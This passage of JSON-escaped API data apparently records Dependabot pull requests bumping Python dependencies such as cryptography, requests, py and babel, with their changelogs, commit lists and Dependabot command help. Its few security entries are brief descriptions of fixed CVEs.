OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Melissa-Forbs/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Melissa-Forbs/solana-program-library/pull/1592","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Melissa-Forbs%2Fsolana-program-library/issues/1592","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1592/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-10T00:22:19.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2579758634","node_id":"PR_kwDOFS5VgM6Zw_4q","number":3,"state":"open","title":"Bump the pip group across 1 directory with 7 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T00:22:19.000Z","updated_at":"2025-06-10T00:22:20.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":7,"packages":[{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"babel","old_version":"2.9.0","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"certifi","old_version":"2020.12.5","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"jinja2","old_version":"2.11.3","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"requests","old_version":"2.25.1","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.4","new_version":"1.26.19","repository_url":"https://github.com/urllib3/urllib3"},{"name":"virtualenv","old_version":"20.4.2","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 7 updates in the /requirements directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [babel](https://github.com/python-babel/babel) | `2.9.0` | `2.9.1` |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.12.5` | `2024.7.4` |\n| [jinja2](https://github.com/pallets/jinja) | `2.11.3` | `3.1.6` |\n| [requests](https://github.com/psf/requests) | `2.25.1` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.26.4` | `1.26.19` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `20.4.2` | `20.26.6` |\n\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.9.0 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 